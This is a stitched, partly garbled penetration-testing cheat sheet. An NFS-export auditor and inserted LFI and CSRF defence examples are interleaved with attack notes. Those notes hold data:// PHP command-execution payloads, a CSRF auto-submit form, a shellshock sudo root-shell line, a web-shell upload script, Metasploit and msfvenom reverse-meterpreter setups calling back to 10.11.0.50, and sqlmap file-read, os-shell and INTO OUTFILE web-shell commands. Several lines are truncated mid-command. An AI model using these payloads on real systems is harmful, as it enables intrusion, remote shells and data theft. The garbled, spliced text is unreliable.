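    """
    exports = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments and blank lines
        if not line:
            continue
        path, *clients = line.split()
        if not clients:
            clients = ["*"]
        for client in clients:
            name, _, opts = client.partition("(")
            options = {o.strip() for o in opts.rstrip(")").split(",") if o.strip()}
            exports.append((path, name, options))
    return exports


def assess_export(path, client, options):
    """Return the risk labels that apply to one export entry (empty if none)."""
    risks = []
    if client == "*" or client.startswith("*."):
        risks.append("wildcard client")
    if "rw" in options:
        risks.append("writable")
    if "no_root_squash" in options:          # remote uid 0 stays uid 0 on the server
        risks.append("no_root_squash")
    if path == "/":
        risks.append("root filesystem exported")
    return risks


def risky_exports(text):
    findings = []
    for path, client, options in parse_exports(text):
        risks = assess_export(path, client, options)
        if risks:
            findings.append((path, client, risks))
    return findings


if __name__ == "__main__":
    for path, client, risks in risky_exports(SAMPLE_EXPORTS):
        print(f"{path} -> {client}: {', '.join(risks)}")
```

Run it against the real /etc/exports (or the output of exportfs -v) on each NFS server; the remediation is to restrict the client list to specific hosts or subnets, export read-only where possible, and keep root_squash, which is the default.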
# simple RFI
page=data://text/plain, <?php system("whoami");?>
# mini shell
page=data://text/plain,<?php system($_GET[cmd]);?>&cmd=id
# base64 + URL encoded mini shell (didn't work without URL encoding)
page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUW2NtZF0pOz8%2B&cmd=id
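The data:// payloads above work because the application passes the page parameter to include() unfiltered, so any PHP stream wrapper is accepted. The validator below is an added example (not from the original notes) of how such a parameter should be handled: decode, refuse anything with a scheme prefix or a null byte, allow only a bare page name, and then look it up in an allow-list. The allowed page names and the template directory are hypothetical values chosen for the example.

```python
import posixpath
import re
from urllib.parse import unquote

ALLOWED_PAGES = {"home", "about", "contact"}         # constructed allow-list
TEMPLATE_DIR = "/var/www/app/pages"                  # hypothetical template directory

# Any scheme prefix: data:, php:, file:, http:, expect:, phar: ...
STREAM_WRAPPER = re.compile(r"^\s*[a-z][a-z0-9+.-]*:", re.IGNORECASE)
# A bare page name: no slashes, dots or extension, so '../' and 'x.php' cannot pass.
PAGE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}")


def check_page(param, allowed=ALLOWED_PAGES, template_dir=TEMPLATE_DIR):
    """Return (path, "ok") for an acceptable page parameter, or (None, reason)."""
    if param is None:
        return None, "missing"
    value = unquote(unquote(param))          # two rounds: catches %252e%252e (double-encoded)
    if "\x00" in value:
        return None, "null byte"
    if STREAM_WRAPPER.match(value):
        return None, "stream wrapper"
    name = value.strip()
    if not PAGE_NAME.fullmatch(name):
        return None, "invalid name"
    if name not in allowed:
        return None, "not in allow-list"
    return posixpath.join(template_dir, name + ".php"), "ok"


if __name__ == "__main__":
    # Constructed inputs: the three payloads from the notes above and a normal page.
    for sample in ["about",
                   'data://text/plain,<?php system("whoami");?>',
                   "data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUW2NtZF0pOz8%2B",
                   "../../etc/passwd"]:
        print(repr(sample), "->", check_page(sample))
```

The allow-list is what actually closes the hole; the wrapper and character checks exist so that the rejection reason can be logged and alerted on, since a data:// or php://filter value in this parameter is a reliable sign of an attack attempt.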
-----------------csrf-for-admin-messages---------------
<html>
<body>
<form name="changepass" method="post" action="http://127.0.0.1:8081/change-password">
<input type="hidden" name="username" value="spiderman">
<input type="hidden" name="password" value="abc123">
</form>
<script type="text/javascript">
document.changepass.submit();
</script>
</body>
</html>
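The auto-submitting form above succeeds only if the change-password endpoint accepts any POST that carries the victim's session cookie. The check below is an added example (not from the original notes) of the server-side defence: a per-session HMAC token that real forms embed and the endpoint verifies, plus an Origin/Referer comparison against the site's own origin. The secret, session id and origin are constructed values; the origin matches the form's action above.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

SERVER_SECRET = secrets.token_bytes(32)       # per-deployment secret (constructed here)
SITE_ORIGIN = "http://127.0.0.1:8081"         # the origin the form above targets


def issue_csrf_token(session_id, secret=SERVER_SECRET):
    """Token bound to the session: HMAC-SHA256(secret, session id), embedded in real forms."""
    return hmac.new(secret, session_id.encode(), hashlib.sha256).hexdigest()


def is_request_allowed(headers, form, session_id, secret=SERVER_SECRET, site_origin=SITE_ORIGIN):
    """Decide whether a state-changing POST may proceed. Returns (allowed, reason)."""
    origin = headers.get("Origin") or headers.get("Referer")
    if not origin:
        return False, "missing Origin/Referer"
    parts = urlsplit(origin)
    if f"{parts.scheme}://{parts.netloc}" != site_origin:
        return False, "cross-origin request"
    token = form.get("csrf_token", "")
    # constant-time comparison so token bytes cannot be guessed via timing
    if not hmac.compare_digest(token, issue_csrf_token(session_id, secret)):
        return False, "bad csrf token"
    return True, "ok"


if __name__ == "__main__":
    sid = "session-abc123"                    # constructed session id
    # The auto-submitting form above carries no token and comes from another origin.
    forged = {"username": "spiderman", "password": "abc123"}
    print(is_request_allowed({"Origin": "http://evil.example"}, forged, sid))
    print(is_request_allowed({"Origin": SITE_ORIGIN}, forged, sid))
    legit = dict(forged, csrf_token=issue_csrf_token(sid))
    print(is_request_allowed({"Origin": SITE_ORIGIN}, legit, sid))
```

The token alone is sufficient against the attack shown; the origin check is kept as a second layer because it also rejects the forged request when a token-less legacy endpoint is still reachable. Tokens here never expire; a production version would rotate them with the session.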
shellshock privilege escalation
sudo PS1="() { :;} ; /bin/sh" /home/bynarr/lime
devnull' or '1
web_delivery_exploit_windows:
https://www.rapid7.com/db/modules/exploit/multi/script/web_delivery
Microsoft Windows - Unauthenticated SMB Remote Code Execution (MS17-010)
https://vulners.com/exploitdb/EDB-ID:41891?utm_source=telegram&utm_medium=vulnersBot&utm_campaign=subsc
; echo '<?php error_reporting(E_ALL); ini_set(display_errors", 1); $fp = fopen($_POST["name"], "wb"); fwrite($fp, base6
python-upload script
import requests, base64

s = requests.session()
target = "http://10.200.0.104:33447/Challenge/test.php"
# read the shell file as bytes and base64-encode it for the "content" field
with open("b374k.php", "rb") as f:
    content = base64.b64encode(f.read()).decode("ascii")
payload = {
    "name": "test2.php",     # form field names must be string keys, not bare names
    "content": content,
}
r = s.post(target, data=payload)
for x in 1466 67 1468 1514 1981 1986; do nmap -Pn --host-timeout 201 --max-retries 0 -p $x 192.168.0.103; done
lsb_release -a
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.11.0.50
set LPORT 1234
set ExitOnSession false
exploit -j -z
https://packetstormsecurity.com/files/139241/vbscan-0.1.7.tar.gz
Linux kernel ptrace/kmod local root exploit/all current 2.2.x and 2.4.x kernels
https://www.win.tue.nl/~aeb/linux/hh/ptrace-kmod-exploit.c
https://www.exploit-db.com/exploits/1198/
http://fuzzysecurity.com/tutorials/16.html
priv esc= half nelson, full nelson, vmsplice and sock sendpage
https://addons.mozilla.org/de/firefox/addon/wappalyzer/
http://tools.kali.org/information-gathering/dotdotpwn
https://bitvijays.github.io/blog/2015/04/09/learning-from-the-field-intelligence-gathering/
http://www.howtogeek.com/104337/hacker-geek-os-fingerprinting-with-ttl-and-tcp-window-sizes/
osce::
http://www.cs.fsu.edu/~redwood/OffensiveComputerSecurity/lectures.html
Web Payloads
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.11.0.50 LPORT=1234 -f raw > shell.php
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.11.0.50
set LPORT 1234
set ExitOnSession false
exploit -j -z
-------------------------------------------------------------------------------------------------------------------------------------------------------
etter=List+of+content+items..." -v 0 --file-read=/etc/apache2/apache2.conf
etter=List+of+content+items..." -v 0 --file-read=/etc/apache2/sites-enabled/000-default
etter=List+of+content+items..." -v 0 --file-read=/var/www/configuration.php # Joomla default
| grep -i pass -A 1 -B 1
password=123&Submit=Login" -v 0 --os-shell
password=123&Submit=Login" ' union select '<?php system($_GET["cmd"]); ?>', '' into outfile '/var/www/bd.php'#